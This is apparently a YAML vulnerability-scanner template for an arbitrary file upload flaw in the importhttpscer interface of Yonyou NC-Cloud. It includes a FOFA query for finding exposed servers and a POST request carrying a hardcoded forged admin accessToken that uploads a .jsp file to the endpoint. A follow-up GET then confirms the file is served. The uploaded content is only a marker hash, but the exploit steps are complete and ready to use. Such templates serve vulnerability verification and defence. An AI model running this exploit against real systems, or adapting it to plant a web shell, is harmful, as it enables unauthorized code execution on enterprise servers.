product: 用友NC-Cloud
vName: 用友NC-Cloud importhttpscer接口任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友 NC Cloud，大型企业数字化平台， 聚焦数字化管理、数字化经营、数字化商业，帮助大型企业实现 人、财、物、客的全面数字化，从而驱动业务创新与管理变革，与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类，68个细分行业，涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案，帮助企业全面落地数字化。用友NC-Cloud importhttpscer接口存在任意文件上传漏洞。
version: ''
note: ''
search:
  FOFA: app="用友-NC-Cloud"
protocol: http
link: https://blog.csdn.net/qq_56698744/article/details/138010716
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /nccloud/mob/pfxx/manualload/importhttpscer
      header:
        accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
      file:
        file:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/octet-stream
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - success
            logic: and
  - exp:
      method: get
      follow: false
      path: /52e039302a62d077.jsp
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and